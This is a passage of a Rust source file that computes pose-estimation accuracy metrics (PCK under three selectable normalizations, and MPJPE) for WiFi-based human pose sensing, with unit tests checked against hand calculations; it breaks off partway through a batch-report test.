//! - MPJPE (mean per-joint position error, mm) is reported by GraphPose-Fi and
|
||||
//! Person-in-WiFi-3D (Yan et al., CVPR 2024).
|
||||
|
||||
use std::collections::BTreeMap;
|
||||
|
||||
use ndarray::{Array1, Array2};
|
||||
|
||||
use crate::metrics_core::{
|
||||
bounding_box_diagonal, CANON_LEFT_HIP, CANON_RIGHT_HIP,
|
||||
};
|
||||
|
||||
/// Visibility cutoff: a keypoint counts as *visible* iff `visibility[j] >= 0.5`
|
||||
/// (COCO convention; matches [`crate::metrics_core`]).
|
||||
const VISIBILITY_THRESHOLD: f32 = 0.5;
|
||||
|
||||
/// Minimum positive normalizer extent. Below this the reference scale is
|
||||
/// considered degenerate (zero torso, collapsed bbox) and the frame is reported
|
||||
/// unscoreable rather than dividing by ≈0.
|
||||
const MIN_REFERENCE_EXTENT: f32 = 1e-6;
|
||||
|
||||
// ===========================================================================
|
||||
// PCK normalization — the explicit, selectable definition
|
||||
// ===========================================================================
|
||||
|
||||
/// The PCK normalization basis — **the single knob that made three project
|
||||
/// numbers non-comparable**, now explicit and carried with every result.
|
||||
///
|
||||
/// A keypoint `j` (with `visibility[j] >= 0.5`) is *correct* iff
|
||||
/// `‖pred_j − gt_j‖₂ ≤ τ`, where the **distance tolerance `τ`** is derived from
|
||||
/// the chosen normalization and the PCK threshold `k` (given as a percentage,
|
||||
/// e.g. `20` for PCK\@20):
|
||||
///
|
||||
/// | Variant | `τ` (tolerance in coordinate units) |
|
||||
/// |---------|--------------------------------------|
|
||||
/// | [`TorsoDiameter`](Self::TorsoDiameter) | `(k/100) · d_torso` |
|
||||
/// | [`BoundingBoxDiagonal`](Self::BoundingBoxDiagonal) | `(k/100) · d_bbox` |
|
||||
/// | [`AbsolutePixels`](Self::AbsolutePixels) | `threshold` (k ignored) |
|
||||
///
|
||||
/// `d_torso` is the hip↔hip span (COCO joints 11↔12), falling back to the bbox
|
||||
/// diagonal when both hips are not visible — identical to
|
||||
/// [`crate::metrics_core::canonical_torso_size`]. `d_bbox` is the diagonal of
|
||||
/// the axis-aligned bounding box of all visible GT keypoints.
|
||||
///
|
||||
/// These yield **different** PCK on the *same* predictions whenever
|
||||
/// `d_torso ≠ d_bbox` (always true for a real pose: the bbox is larger than the
|
||||
/// hip span), which is exactly why the 96 / 81.6 / 61 numbers cannot be lined
|
||||
/// up without declaring this enum.
|
||||
#[derive(Debug, Clone, Copy, PartialEq)]
|
||||
pub enum PckNormalization {
|
||||
/// **Torso-diameter** (hip↔hip span). The standard MM-Fi / GraphPose-Fi
|
||||
/// convention and the *stricter* of the two relative normalizers. This is
|
||||
/// the canonical default ([`crate::metrics_core::pck_canonical`]).
|
||||
TorsoDiameter,
|
||||
/// **Bounding-box diagonal** (a.k.a. image-normalized). The looser
|
||||
/// WiFlow-STD-style convention: normalize by the GT pose bbox diagonal,
|
||||
/// which is larger than the torso span ⇒ a more forgiving threshold ⇒ a
|
||||
/// higher PCK on identical predictions.
|
||||
BoundingBoxDiagonal,
|
||||
/// **Absolute pixel/coordinate threshold** — no pose-relative
|
||||
/// normalization. The PCK `k` percentage is ignored; the held `threshold`
|
||||
/// is the raw distance tolerance directly. Included so historical
|
||||
/// retracted-style numbers are reproducible, and **clearly labeled as
|
||||
/// non-comparable** to the relative variants (it does not scale with body
|
||||
/// size or camera distance).
|
||||
AbsolutePixels(f32),
|
||||
}
|
||||
|
||||
impl PckNormalization {
|
||||
/// Human-readable, *self-documenting* label for a reported number — so a
|
||||
/// `PoseAccuracy` printed anywhere always carries its definition.
|
||||
pub fn label(&self) -> String {
|
||||
match self {
|
||||
PckNormalization::TorsoDiameter => "torso-diameter".to_string(),
|
||||
PckNormalization::BoundingBoxDiagonal => "bbox-diagonal".to_string(),
|
||||
PckNormalization::AbsolutePixels(t) => format!("absolute-px({t})"),
|
||||
}
|
||||
}
|
||||
|
||||
/// Compute the per-frame distance tolerance `τ` for PCK threshold `k`
|
||||
/// (percentage). Returns `None` when the (relative) normalizer is degenerate
|
||||
/// — the frame cannot be scored.
|
||||
///
|
||||
/// `gt_kpts` is `[n, 2]` (or `[n, ≥2]`, only x/y used); `visibility` is `[n]`.
|
||||
fn tolerance(&self, gt_kpts: &Array2<f32>, visibility: &Array1<f32>, k: u8) -> Option<f32> {
|
||||
let n = gt_kpts.shape()[0].min(visibility.len());
|
||||
match self {
|
||||
PckNormalization::AbsolutePixels(threshold) => {
|
||||
// Raw tolerance, independent of pose scale and of `k`.
|
||||
if *threshold > 0.0 {
|
||||
Some(*threshold)
|
||||
} else {
|
||||
None
|
||||
}
|
||||
}
|
||||
PckNormalization::TorsoDiameter => {
|
||||
let d = torso_diameter(gt_kpts, visibility, n)?;
|
||||
Some((k as f32 / 100.0) * d)
|
||||
}
|
||||
PckNormalization::BoundingBoxDiagonal => {
|
||||
let d = bounding_box_diagonal(gt_kpts, visibility, n);
|
||||
if d > MIN_REFERENCE_EXTENT {
|
||||
Some((k as f32 / 100.0) * d)
|
||||
} else {
|
||||
None
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Hip↔hip torso diameter with a bbox-diagonal fallback — the relative
|
||||
/// normalizer shared by `TorsoDiameter` PCK and
|
||||
/// [`crate::metrics_core::canonical_torso_size`]. Returns `None` when no
|
||||
/// positive-extent reference exists.
|
||||
fn torso_diameter(gt_kpts: &Array2<f32>, visibility: &Array1<f32>, n: usize) -> Option<f32> {
|
||||
if CANON_LEFT_HIP < n
|
||||
&& CANON_RIGHT_HIP < n
|
||||
&& visibility[CANON_LEFT_HIP] >= VISIBILITY_THRESHOLD
|
||||
&& visibility[CANON_RIGHT_HIP] >= VISIBILITY_THRESHOLD
|
||||
{
|
||||
let dx = gt_kpts[[CANON_LEFT_HIP, 0]] - gt_kpts[[CANON_RIGHT_HIP, 0]];
|
||||
let dy = gt_kpts[[CANON_LEFT_HIP, 1]] - gt_kpts[[CANON_RIGHT_HIP, 1]];
|
||||
let torso = (dx * dx + dy * dy).sqrt();
|
||||
if torso > MIN_REFERENCE_EXTENT {
|
||||
return Some(torso);
|
||||
}
|
||||
}
|
||||
let diag = bounding_box_diagonal(gt_kpts, visibility, n);
|
||||
if diag > MIN_REFERENCE_EXTENT {
|
||||
Some(diag)
|
||||
} else {
|
||||
None
|
||||
}
|
||||
}
|
||||
|
||||
// ===========================================================================
|
||||
// Single-frame PCK / MPJPE
|
||||
// ===========================================================================
|
||||
|
||||
/// Per-frame **PCK\@`k`** under the selected `normalization`.
|
||||
///
|
||||
/// A keypoint `j` with `visibility[j] >= 0.5` is correct iff
|
||||
/// `‖pred_j − gt_j‖₂ ≤ τ`, with `τ` from
|
||||
/// [`PckNormalization::tolerance`]. Only x/y are used (2D PCK is the standard
|
||||
/// keypoint-PCK definition; pass 2-column arrays).
|
||||
///
|
||||
/// # Returns
|
||||
/// `(correct, total, pck)` with `pck ∈ [0,1]`. **`(0, 0, 0.0)`** when no
|
||||
/// keypoint is visible, or (for the relative normalizers) the reference scale is
|
||||
/// degenerate — a frame with no measurable evidence scores 0, never 1.
|
||||
/// NaN-valued coordinates make a keypoint *incorrect* (the `<=` comparison is
|
||||
/// false for NaN) rather than panicking.
|
||||
pub fn pck_at(
|
||||
pred_kpts: &Array2<f32>,
|
||||
gt_kpts: &Array2<f32>,
|
||||
visibility: &Array1<f32>,
|
||||
k: u8,
|
||||
normalization: PckNormalization,
|
||||
) -> (usize, usize, f32) {
|
||||
let n = pred_kpts.shape()[0]
|
||||
.min(gt_kpts.shape()[0])
|
||||
.min(visibility.len());
|
||||
let tol = match normalization.tolerance(gt_kpts, visibility, k) {
|
||||
Some(t) => t,
|
||||
None => return (0, 0, 0.0),
|
||||
};
|
||||
|
||||
let mut correct = 0usize;
|
||||
let mut total = 0usize;
|
||||
for j in 0..n {
|
||||
if visibility[j] < VISIBILITY_THRESHOLD {
|
||||
continue;
|
||||
}
|
||||
total += 1;
|
||||
let dx = pred_kpts[[j, 0]] - gt_kpts[[j, 0]];
|
||||
let dy = pred_kpts[[j, 1]] - gt_kpts[[j, 1]];
|
||||
let dist = (dx * dx + dy * dy).sqrt();
|
||||
// NaN-safe: `NaN <= tol` is false, so a NaN coordinate counts as wrong.
|
||||
if dist <= tol {
|
||||
correct += 1;
|
||||
}
|
||||
}
|
||||
let pck = if total > 0 {
|
||||
correct as f32 / total as f32
|
||||
} else {
|
||||
0.0
|
||||
};
|
||||
(correct, total, pck)
|
||||
}
|
||||
|
||||
/// Per-frame **MPJPE** (mean per-joint position error) over visible keypoints,
|
||||
/// in the coordinate units of the inputs (report as mm when inputs are mm).
|
||||
///
|
||||
/// `pred`/`gt` are `[n, D]` with `D ∈ {2, 3}` (2D or 3D pose); all `D` columns
|
||||
/// are used. Joints with `visibility[j] < 0.5` are excluded.
|
||||
///
|
||||
/// Returns `0.0` when no keypoint is visible (no evidence). A NaN coordinate
|
||||
/// propagates into the returned mean (callers filter NaN frames upstream); it
|
||||
/// does not panic.
|
||||
pub fn mpjpe(pred: &Array2<f32>, gt: &Array2<f32>, visibility: &Array1<f32>) -> f32 {
|
||||
let n = pred.shape()[0].min(gt.shape()[0]).min(visibility.len());
|
||||
let d = pred.shape()[1].min(gt.shape()[1]);
|
||||
let mut sum = 0.0f32;
|
||||
let mut count = 0usize;
|
||||
for j in 0..n {
|
||||
if visibility[j] < VISIBILITY_THRESHOLD {
|
||||
continue;
|
||||
}
|
||||
let mut sq = 0.0f32;
|
||||
for c in 0..d {
|
||||
let diff = pred[[j, c]] - gt[[j, c]];
|
||||
sq += diff * diff;
|
||||
}
|
||||
sum += sq.sqrt();
|
||||
count += 1;
|
||||
}
|
||||
if count > 0 {
|
||||
sum / count as f32
|
||||
} else {
|
||||
0.0
|
||||
}
|
||||
}
|
||||
|
||||
// ===========================================================================
|
||||
// Self-describing result struct + batch report
|
||||
// ===========================================================================
|
||||
|
||||
/// A pose-accuracy result that **always carries the definition it was computed
|
||||
/// under** — making an unlabeled PCK number structurally impossible.
|
||||
///
|
||||
/// Built by [`accuracy_report`] over a set of frames. `pck_at` maps each
|
||||
/// requested threshold `k` (percentage, e.g. `20`) to its PCK in `[0,1]`. The
|
||||
/// `normalization` field records *which* PCK definition produced those numbers,
|
||||
/// so two `PoseAccuracy` values can only be compared when their `normalization`
|
||||
/// matches (the comparability check the project lacked).
|
||||
#[derive(Debug, Clone, PartialEq)]
|
||||
pub struct PoseAccuracy {
|
||||
/// PCK\@k for each requested threshold percentage `k`, in `[0,1]`.
|
||||
pub pck_at: BTreeMap<u8, f32>,
|
||||
/// Mean per-joint position error in coordinate units (mm for mm inputs).
|
||||
pub mpjpe: f32,
|
||||
/// The normalization basis under which `pck_at` was computed — the label a
|
||||
/// reported number must always carry.
|
||||
pub normalization: PckNormalization,
|
||||
/// Number of keypoints per frame (the pose convention, e.g. 17 for COCO).
|
||||
pub n_keypoints: usize,
|
||||
/// Number of frames aggregated into this result.
|
||||
pub n_frames: usize,
|
||||
}
|
||||
|
||||
impl PoseAccuracy {
|
||||
/// Convenience accessor for a single threshold, returning `None` when that
|
||||
/// `k` was not requested.
|
||||
pub fn pck(&self, k: u8) -> Option<f32> {
|
||||
self.pck_at.get(&k).copied()
|
||||
}
|
||||
|
||||
/// A one-line, self-documenting summary suitable for logs / RESULTS.md, e.g.
|
||||
/// `PCK@20=0.750 (torso-diameter, 17kp, 1 frames) MPJPE=0.0300`.
|
||||
pub fn summary(&self) -> String {
|
||||
let pcks: Vec<String> = self
|
||||
.pck_at
|
||||
.iter()
|
||||
.map(|(k, v)| format!("PCK@{k}={v:.3}"))
|
||||
.collect();
|
||||
format!(
|
||||
"{} ({}, {}kp, {} frames) MPJPE={:.4}",
|
||||
pcks.join(" "),
|
||||
self.normalization.label(),
|
||||
self.n_keypoints,
|
||||
self.n_frames,
|
||||
self.mpjpe
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
/// One frame's prediction + ground truth + visibility for batch scoring.
|
||||
///
|
||||
/// All three arrays share row count `n_keypoints`; `pred`/`gt` are `[n, D]`
|
||||
/// (`D ∈ {2,3}`), `visibility` is `[n]`.
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct PoseFrame {
|
||||
/// Predicted keypoints `[n, D]`.
|
||||
pub pred: Array2<f32>,
|
||||
/// Ground-truth keypoints `[n, D]`.
|
||||
pub gt: Array2<f32>,
|
||||
/// Per-keypoint visibility `[n]` (`>= 0.5` ⇒ visible).
|
||||
pub visibility: Array1<f32>,
|
||||
}
|
||||
|
||||
/// Aggregate [`PoseAccuracy`] over a batch of frames under **one** explicit
|
||||
/// `normalization`, for the requested PCK thresholds `ks` (percentages).
|
||||
///
|
||||
/// PCK is micro-averaged over keypoints (sum of correct ÷ sum of visible across
|
||||
/// all frames — the standard keypoint-PCK aggregation), so frames with more
|
||||
/// visible joints contribute proportionally. MPJPE is micro-averaged over
|
||||
/// visible joints likewise. Unscoreable frames (no visible joints, degenerate
|
||||
/// relative normalizer) contribute `(0, 0)` and so are excluded from the
|
||||
/// denominator rather than scored as perfect.
|
||||
///
|
||||
/// An **empty** `frames` slice yields all-zero PCK and `0.0` MPJPE — never a
|
||||
/// panic or NaN.
|
||||
pub fn accuracy_report(
|
||||
frames: &[PoseFrame],
|
||||
ks: &[u8],
|
||||
normalization: PckNormalization,
|
||||
) -> PoseAccuracy {
|
||||
let n_keypoints = frames.first().map(|f| f.gt.shape()[0]).unwrap_or(0);
|
||||
|
||||
// PCK: per-threshold (correct, total) accumulators across frames.
|
||||
let mut pck_acc: BTreeMap<u8, (usize, usize)> = ks.iter().map(|&k| (k, (0, 0))).collect();
|
||||
// MPJPE: sum of per-joint distances and visible-joint count.
|
||||
let mut mpjpe_sum = 0.0f32;
|
||||
let mut mpjpe_count = 0usize;
|
||||
|
||||
for frame in frames {
|
||||
for &k in ks {
|
||||
let (c, t, _) = pck_at(&frame.pred, &frame.gt, &frame.visibility, k, normalization);
|
||||
let entry = pck_acc.entry(k).or_insert((0, 0));
|
||||
entry.0 += c;
|
||||
entry.1 += t;
|
||||
}
|
||||
// Per-frame MPJPE re-derived as a (sum, count) contribution so the
|
||||
// batch value is a true micro-average over joints.
|
||||
let n = frame.pred.shape()[0].min(frame.gt.shape()[0]).min(frame.visibility.len());
|
||||
let d = frame.pred.shape()[1].min(frame.gt.shape()[1]);
|
||||
for j in 0..n {
|
||||
if frame.visibility[j] < VISIBILITY_THRESHOLD {
|
||||
continue;
|
||||
}
|
||||
let mut sq = 0.0f32;
|
||||
for c in 0..d {
|
||||
let diff = frame.pred[[j, c]] - frame.gt[[j, c]];
|
||||
sq += diff * diff;
|
||||
}
|
||||
mpjpe_sum += sq.sqrt();
|
||||
mpjpe_count += 1;
|
||||
}
|
||||
}
|
||||
|
||||
let pck_at: BTreeMap<u8, f32> = pck_acc
|
||||
.into_iter()
|
||||
.map(|(k, (c, t))| {
|
||||
let v = if t > 0 { c as f32 / t as f32 } else { 0.0 };
|
||||
(k, v)
|
||||
})
|
||||
.collect();
|
||||
|
||||
let mpjpe = if mpjpe_count > 0 {
|
||||
mpjpe_sum / mpjpe_count as f32
|
||||
} else {
|
||||
0.0
|
||||
};
|
||||
|
||||
PoseAccuracy {
|
||||
pck_at,
|
||||
mpjpe,
|
||||
normalization,
|
||||
n_keypoints,
|
||||
n_frames: frames.len(),
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
/// Build a 17-joint `[17, 2]` pose from `(joint, x, y)` triples.
|
||||
fn pose17(joints: &[(usize, f32, f32)]) -> Array2<f32> {
|
||||
let mut a = Array2::<f32>::zeros((17, 2));
|
||||
for &(j, x, y) in joints {
|
||||
a[[j, 0]] = x;
|
||||
a[[j, 1]] = y;
|
||||
}
|
||||
a
|
||||
}
|
||||
|
||||
fn vis17(visible: &[usize]) -> Array1<f32> {
|
||||
let mut v = Array1::<f32>::zeros(17);
|
||||
for &j in visible {
|
||||
v[j] = 2.0;
|
||||
}
|
||||
v
|
||||
}
|
||||
|
||||
// -------- consts pinned (no silent metric drift) --------
|
||||
#[test]
|
||||
fn accuracy_consts_unchanged() {
|
||||
assert_eq!(VISIBILITY_THRESHOLD, 0.5_f32);
|
||||
assert_eq!(MIN_REFERENCE_EXTENT, 1e-6_f32);
|
||||
}
|
||||
|
||||
// -------- perfect prediction ⇒ PCK = 1.0, MPJPE = 0 --------
|
||||
#[test]
|
||||
fn perfect_prediction_pck_one_mpjpe_zero() {
|
||||
let gt = pose17(&[
|
||||
(5, 0.35, 0.35),
|
||||
(CANON_LEFT_HIP, 0.40, 0.50),
|
||||
(CANON_RIGHT_HIP, 0.60, 0.50),
|
||||
]);
|
||||
let vis = vis17(&[5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
for norm in [
|
||||
PckNormalization::TorsoDiameter,
|
||||
PckNormalization::BoundingBoxDiagonal,
|
||||
PckNormalization::AbsolutePixels(0.01),
|
||||
] {
|
||||
let (c, t, pck) = pck_at(&gt, &gt, &vis, 20, norm);
|
||||
assert_eq!((c, t), (3, 3), "{norm:?}");
|
||||
assert!((pck - 1.0).abs() < 1e-6, "{norm:?} perfect PCK must be 1.0");
|
||||
}
|
||||
assert_eq!(mpjpe(&gt, &gt, &vis), 0.0);
|
||||
}
|
||||
|
||||
// -------- all keypoints just OUTSIDE threshold ⇒ PCK = 0.0 --------
|
||||
//
|
||||
// Hand calc (torso): hips at (0.40,0.50)/(0.60,0.50) ⇒ torso = 0.20.
|
||||
// threshold k=20 ⇒ τ = 0.20·0.20 = 0.04. Push every scored joint to an
|
||||
// error of 0.05 (> 0.04) ⇒ all wrong. To avoid the hips themselves being
|
||||
// "correct", we displace the hips too (their displaced positions still
|
||||
// define the torso from GT, which is unchanged).
|
||||
#[test]
|
||||
fn all_just_outside_threshold_pck_zero() {
|
||||
let gt = pose17(&[
|
||||
(5, 0.50, 0.50),
|
||||
(CANON_LEFT_HIP, 0.40, 0.50),
|
||||
(CANON_RIGHT_HIP, 0.60, 0.50),
|
||||
]);
|
||||
// GT torso = 0.20, τ@20 = 0.04. Displace each scored joint by dx=0.05.
|
||||
let pred = pose17(&[
|
||||
(5, 0.55, 0.50),
|
||||
(CANON_LEFT_HIP, 0.45, 0.50),
|
||||
(CANON_RIGHT_HIP, 0.65, 0.50),
|
||||
]);
|
||||
let vis = vis17(&[5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
let (c, t, pck) = pck_at(&pred, &gt, &vis, 20, PckNormalization::TorsoDiameter);
|
||||
assert_eq!(t, 3);
|
||||
assert_eq!(c, 0, "all errors 0.05 > τ 0.04 ⇒ none correct");
|
||||
assert_eq!(pck, 0.0);
|
||||
}
|
||||
|
||||
// -------- half-in / half-out ⇒ PCK = 0.5 --------
|
||||
//
|
||||
// Hand calc (torso): torso = 0.20, τ@20 = 0.04. Four visible joints; two
|
||||
// exact (dist 0 ≤ 0.04, correct), two displaced 0.05 (> 0.04, wrong)
|
||||
// ⇒ 2/4 = 0.5.
|
||||
#[test]
|
||||
fn half_in_half_out_pck_half() {
|
||||
let gt = pose17(&[
|
||||
(0, 0.50, 0.20),
|
||||
(5, 0.50, 0.50),
|
||||
(CANON_LEFT_HIP, 0.40, 0.50),
|
||||
(CANON_RIGHT_HIP, 0.60, 0.50),
|
||||
]);
|
||||
let pred = pose17(&[
|
||||
(0, 0.50, 0.20), // exact ⇒ correct
|
||||
(5, 0.55, 0.50), // err 0.05 ⇒ wrong
|
||||
(CANON_LEFT_HIP, 0.40, 0.50), // exact ⇒ correct
|
||||
(CANON_RIGHT_HIP, 0.65, 0.50), // err 0.05 ⇒ wrong
|
||||
]);
|
||||
let vis = vis17(&[0, 5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
let (c, t, pck) = pck_at(&pred, &gt, &vis, 20, PckNormalization::TorsoDiameter);
|
||||
assert_eq!((c, t), (2, 4));
|
||||
assert!((pck - 0.5).abs() < 1e-6, "expected 0.5, got {pck}");
|
||||
}
|
||||
|
||||
// -------- THE KEY PROOF: same predictions, three normalizations, three PCK --------
|
||||
//
|
||||
// One construction scored three ways. Hand calc:
|
||||
// GT: nose(0)=(0.50,0.10), l_sh(5)=(0.50,0.30),
|
||||
// l_hip(11)=(0.40,0.90), r_hip(12)=(0.60,0.90).
|
||||
// Visible = {0,5,11,12}, all four.
|
||||
// torso = |0.60-0.40| = 0.20 (hips, y equal).
|
||||
// bbox: x∈[0.40,0.60] (w=0.20), y∈[0.10,0.90] (h=0.80)
|
||||
// ⇒ diag = sqrt(0.20² + 0.80²) = sqrt(0.04+0.64)=sqrt(0.68)=0.8246…
|
||||
//
|
||||
// Pred errors (pure dx): nose 0.06, l_sh 0.10, l_hip 0.00, r_hip 0.00.
//
// k = 20:
// • Torso τ = 0.20·0.20 = 0.040 → nose 0.06 > 0.040 and l_sh 0.10 > 0.040 ⇒ both WRONG
// ⇒ 2 correct / 4 = 0.50
// • Bbox τ = 0.20·0.8246 = 0.16492 → nose 0.06 and l_sh 0.10 both ≤ 0.16492 ⇒ both CORRECT
// ⇒ 4 correct / 4 = 1.00
// • Abs(0.08) τ = 0.08 → nose 0.06 ≤ 0.08 ⇒ CORRECT, l_sh 0.10 > 0.08 ⇒ WRONG
// ⇒ 3 correct / 4 = 0.75
//
// The nose displacement (0.06) is chosen to sit between the torso tolerance
// (0.04) and the absolute tolerance (0.08). With only the shoulder displaced,
// torso and absolute would both score 0.75 and the three values would not all
// differ.
|
||||
#[test]
|
||||
fn three_normalizations_give_different_pck_on_identical_input() {
|
||||
let gt = pose17(&[
|
||||
(0, 0.50, 0.10), // nose
|
||||
(5, 0.50, 0.30), // left_shoulder
|
||||
(CANON_LEFT_HIP, 0.40, 0.90),
|
||||
(CANON_RIGHT_HIP, 0.60, 0.90),
|
||||
]);
|
||||
// nose displaced 0.06, shoulder displaced 0.10, hips exact.
|
||||
let pred = pose17(&[
|
||||
(0, 0.56, 0.10), // err 0.06
|
||||
(5, 0.60, 0.30), // err 0.10
|
||||
(CANON_LEFT_HIP, 0.40, 0.90), // exact
|
||||
(CANON_RIGHT_HIP, 0.60, 0.90), // exact
|
||||
]);
|
||||
let vis = vis17(&[0, 5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
|
||||
// Torso τ@20 = 0.04: nose 0.06>0.04 wrong, sh 0.10>0.04 wrong,
|
||||
// hips exact ⇒ 2/4 = 0.5.
|
||||
let (_, _, torso) = pck_at(&pred, &gt, &vis, 20, PckNormalization::TorsoDiameter);
|
||||
// Bbox diag = sqrt(0.68)=0.82462; τ@20 = 0.164924:
|
||||
// nose 0.06 ≤ τ correct, sh 0.10 ≤ τ correct, hips exact ⇒ 4/4 = 1.0.
|
||||
let (_, _, bbox) = pck_at(&pred, &gt, &vis, 20, PckNormalization::BoundingBoxDiagonal);
|
||||
// Abs(0.08): nose 0.06 ≤ 0.08 correct, sh 0.10 > 0.08 wrong, hips exact
|
||||
// ⇒ 3/4 = 0.75.
|
||||
let (_, _, abs) = pck_at(&pred, &gt, &vis, 20, PckNormalization::AbsolutePixels(0.08));
|
||||
|
||||
assert!((torso - 0.5).abs() < 1e-6, "torso PCK expected 0.5, got {torso}");
|
||||
assert!((bbox - 1.0).abs() < 1e-6, "bbox PCK expected 1.0, got {bbox}");
|
||||
assert!((abs - 0.75).abs() < 1e-6, "abs(0.08) PCK expected 0.75, got {abs}");
|
||||
|
||||
// The whole point: identical predictions, three DISTINCT PCK values.
|
||||
assert!(torso != bbox && bbox != abs && torso != abs,
|
||||
"normalizations must give distinct PCK: torso={torso}, bbox={bbox}, abs={abs}");
|
||||
}
|
||||
|
||||
// -------- AbsolutePixels ignores k (raw threshold) --------
|
||||
#[test]
|
||||
fn absolute_pixels_ignores_threshold_percentage() {
|
||||
let gt = pose17(&[(5, 0.50, 0.50), (CANON_LEFT_HIP, 0.40, 0.50), (CANON_RIGHT_HIP, 0.60, 0.50)]);
|
||||
let pred = pose17(&[(5, 0.53, 0.50), (CANON_LEFT_HIP, 0.40, 0.50), (CANON_RIGHT_HIP, 0.60, 0.50)]);
|
||||
let vis = vis17(&[5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
// τ = 0.05 raw; joint5 err 0.03 ≤ 0.05 correct. k=5 and k=99 must agree.
|
||||
let (_, _, p5) = pck_at(&pred, &gt, &vis, 5, PckNormalization::AbsolutePixels(0.05));
|
||||
let (_, _, p99) = pck_at(&pred, &gt, &vis, 99, PckNormalization::AbsolutePixels(0.05));
|
||||
assert_eq!(p5, p99, "AbsolutePixels must ignore the k percentage");
|
||||
assert!((p5 - 1.0).abs() < 1e-6, "all three within 0.05, got {p5}");
|
||||
}
|
||||
|
||||
// -------- MPJPE hand-computed (2D and 3D) --------
|
||||
#[test]
|
||||
fn mpjpe_hand_computed_2d() {
|
||||
// joint0 err (3,4)->5, joint1 exact->0 ⇒ mean (5+0)/2 = 2.5.
|
||||
let gt = Array2::from_shape_vec((2, 2), vec![0.0, 0.0, 1.0, 1.0]).unwrap();
|
||||
let pred = Array2::from_shape_vec((2, 2), vec![3.0, 4.0, 1.0, 1.0]).unwrap();
|
||||
let vis = Array1::from(vec![2.0, 2.0]);
|
||||
assert!((mpjpe(&pred, &gt, &vis) - 2.5).abs() < 1e-6);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn mpjpe_hand_computed_3d() {
|
||||
// single joint err (1,2,2) -> sqrt(1+4+4)=3.0.
|
||||
let gt = Array2::from_shape_vec((1, 3), vec![0.0, 0.0, 0.0]).unwrap();
|
||||
let pred = Array2::from_shape_vec((1, 3), vec![1.0, 2.0, 2.0]).unwrap();
|
||||
let vis = Array1::from(vec![2.0]);
|
||||
assert!((mpjpe(&pred, &gt, &vis) - 3.0).abs() < 1e-6);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn mpjpe_excludes_invisible_joints() {
|
||||
// joint0 visible err 5, joint1 INVISIBLE err 100 ⇒ mean = 5 (joint1 dropped).
|
||||
let gt = Array2::from_shape_vec((2, 2), vec![0.0, 0.0, 0.0, 0.0]).unwrap();
|
||||
let pred = Array2::from_shape_vec((2, 2), vec![3.0, 4.0, 100.0, 0.0]).unwrap();
|
||||
let vis = Array1::from(vec![2.0, 0.0]);
|
||||
assert!((mpjpe(&pred, &gt, &vis) - 5.0).abs() < 1e-6);
|
||||
}
|
||||
|
||||
// -------- degenerate inputs: no panic --------
|
||||
#[test]
|
||||
fn zero_torso_is_unscoreable_not_perfect() {
|
||||
// Both hips coincident ⇒ torso ≈ 0; bbox also collapses ⇒ None.
|
||||
let gt = pose17(&[(CANON_LEFT_HIP, 0.5, 0.5), (CANON_RIGHT_HIP, 0.5, 0.5)]);
|
||||
let vis = vis17(&[CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
assert_eq!(pck_at(&gt, &gt, &vis, 20, PckNormalization::TorsoDiameter), (0, 0, 0.0));
|
||||
assert_eq!(pck_at(&gt, &gt, &vis, 20, PckNormalization::BoundingBoxDiagonal), (0, 0, 0.0));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn no_visible_keypoints_scores_zero() {
|
||||
let gt = pose17(&[(CANON_LEFT_HIP, 0.4, 0.5), (CANON_RIGHT_HIP, 0.6, 0.5)]);
|
||||
let vis = vis17(&[]); // nothing visible
|
||||
let (c, t, pck) = pck_at(&gt, &gt, &vis, 20, PckNormalization::TorsoDiameter);
|
||||
assert_eq!((c, t, pck), (0, 0, 0.0));
|
||||
assert_eq!(mpjpe(&gt, &gt, &vis), 0.0);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn nan_coords_do_not_panic_and_count_wrong() {
|
||||
let gt = pose17(&[(5, 0.5, 0.5), (CANON_LEFT_HIP, 0.4, 0.5), (CANON_RIGHT_HIP, 0.6, 0.5)]);
|
||||
let mut pred = gt.clone();
|
||||
pred[[5, 0]] = f32::NAN; // joint 5 prediction is NaN
|
||||
let vis = vis17(&[5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
let (c, t, pck) = pck_at(&pred, &gt, &vis, 20, PckNormalization::TorsoDiameter);
|
||||
assert_eq!(t, 3);
|
||||
assert_eq!(c, 2, "NaN joint must count as wrong, hips correct ⇒ 2/3");
|
||||
assert!((pck - 2.0 / 3.0).abs() < 1e-6);
|
||||
// mpjpe with a NaN joint yields NaN (caller filters) but must not panic.
|
||||
assert!(mpjpe(&pred, &gt, &vis).is_nan());
|
||||
}
|
||||
|
||||
// -------- batch report: micro-average + self-describing struct --------
|
||||
#[test]
|
||||
fn accuracy_report_micro_averages_and_carries_definition() {
|
||||
// Frame A: 2 visible, both correct (2/2). Frame B: 2 visible, both wrong (0/2).
|
||||
// Micro-average over joints: 2 correct / 4 = 0.5 (NOT mean-of-frame-PCK,
|
||||
// which would be (1.0+0.0)/2 = 0.5 here too, but the accumulator is the
|
||||
// joint-level one).
|
||||
let gt = pose17(&[(CANON_LEFT_HIP, 0.40, 0.50), (CANON_RIGHT_HIP, 0.60, 0.50)]);
|
||||
let vis = vis17(&[CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
let frame_a = PoseFrame { pred: gt.clone(), gt: gt.clone(), visibility: vis.clone() };
|
||||
// Frame B: displace both hips by 0.05 (> τ 0.04) ⇒ both wrong.
|
||||
let pred_b = pose17(&[(CANON_LEFT_HIP, 0.45, 0.50), (CANON_RIGHT_HIP, 0.65, 0.50)]);
|
||||
let frame_b = PoseFrame { pred: pred_b, gt: gt.clone(), visibility: vis.clone() };
|
||||
|
||||
let report = accuracy_report(
|
||||
&[frame_a, frame_b],
|
||||
&[20, 50],
|
||||
PckNormalization::TorsoDiameter,
